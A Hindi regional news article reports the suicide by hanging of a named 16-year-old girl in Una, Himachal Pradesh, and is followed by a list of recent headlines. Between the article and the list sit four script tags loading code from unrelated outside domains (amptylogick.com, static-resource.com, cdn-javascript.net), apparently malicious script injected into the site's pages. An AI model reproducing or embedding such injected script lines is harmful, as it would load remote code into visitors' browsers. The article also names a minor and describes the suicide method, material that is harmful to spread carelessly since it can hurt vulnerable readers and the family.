ऊनाः 16 साल की नाबालिग लड़की ने फंदा लगाकार की आत्महत्या

<p>जिला ऊना में शहर से सटे रामपुर में 16 साल की नाबालिगा द्वारा फंदा लगाकर जान देने का मामला सामने आया है। मृतका की पहचान उत्तर प्रदेश के मुरादाबाद जिले के बलदेहपुर की निवासी प्रेमवती पुत्री राजपाल के रूप में की गई है। पुलिस ने शव को कब्जे में लेकर मामले की जांच शुरू कर दी है। वहीं, घटना के संबंध में केस दर्ज़ करते हुए मामले की जांच शुरू कर दी है। मिली जानकारी के मुताबिक मुरादाबाद के बलदेहपुर निवासी राजपाल रामपुर में परिवार समेत रहता है। यहां वह मेहनत मजदूरी करते हुए परिवार को पालता है।</p>

<p>बुधवार सुबह वह रोजाना की तरह काम पर चला गया। उसकी पत्नी भी घरेलू काम में जुट गई। जबकि मृतका के छोटे भाई-बहन भी घर के पास ही खेल रहे थे। इस दौरान उन्होंने देखा कि प्रेमवती कमरे में छत के पंखे के साथ लटक रही है। उन्होंने फौरन मां को इस बारे में बताया। बेटी का फंदे पर झूलते देख मां के होश फाख्ता हो गए और उसने शोर मचाना शुरू कर दिया। जिसे सुनकर आसपास के लोग भी मौके पर आ गए। उन्होंने प्रेमवती को फौरन नीचे उतारा और रीजनल अस्पताल ऊना ले आए। जहां उसे मृत घोषित कर दिया गया।</p>

<p>डीएसपी हैडक्वार्टर अशोक वर्मा ने बताया कि पुलिस ने घटना के संबंध में केस दर्ज़ करते हुए मामले की जांच शुरू कर दी है। परिजनों ने बताया कि मृतका ने पढ़ाई भी छोड़ दी थी। मृतका ने फंदा क्यों लगाया इसका अभी खुलासा नहीं हो सका है। परिजनों से भी पूछताछ चल रही है।</p>
<script src=”//amptylogick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1577268919424″ type=”text/javascript”></script>
<script src=”http://amptylogick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

Hamirpur News: आशा वर्कर्स ने उठाई स्थाई नीति और रिटायरमेंट बेनिफिट्स की मांग

Asha Worker:  आशा वर्कर्स, जो लंबे समय से ग्रामीण और शहरी क्षेत्रों में स्वास्थ्य सेवाएं…

6 mins ago

Hamirpur News: एनएच निर्माण कंपनी पर आस्था को ठेस पहुंचाने का आरोप, ग्रामीणों ने दी चेतावनी

नेशनल हाईवे नंबर तीन का निर्माण कर रही सूर्य कंस्ट्रक्शन कंपनी के खिलाफ स्थानीय ग्रामीणों…

11 mins ago

नाहन के दीक्षित वर्मा का राष्ट्रीय फुटबॉल प्रतियोगिता के लिए चयन

Nahan: सिरमौर जिला मुख्यालय नाहन के माध्यमिक पाठशाला कैंट के छात्र दीक्षित वर्मा का राष्ट्रीय…

14 mins ago

Politics: केंद्र से कोई वित्तीय सहायता नहीं, फिर भी प्रदेश सरकार ने कर्मचारियों के लिए उठाए बड़े कदम: पवन ठाकुर

Mandi:  प्रदेश की गंभीर वित्तीय स्थिति के बावजूद हिमाचल प्रदेश के मुख्यमंत्री सुखविंदर सिंह सुक्खू…

24 mins ago

मुकदमा निरस्त न हुआ तो प्रदेश भर के पत्रकार करेंगे विरोध: बीरबल शर्मा

Himachal journalist case:  हिमाचल प्रदेश यूनियन ऑफ जर्नलिस्ट्स, नेशनल यूनियन ऑफ जर्नलिस्ट्स, और मंडी जिला…

47 mins ago

बारात के जश्‍न में थे सब मगन, अचानक दूल्‍हे के पिता को आया हार्ट अटैक और मौत

हिमाचल प्रदेश के चंबा जिले के मतियारा गांव में शादी का माहौल उस समय मातम…

3 hours ago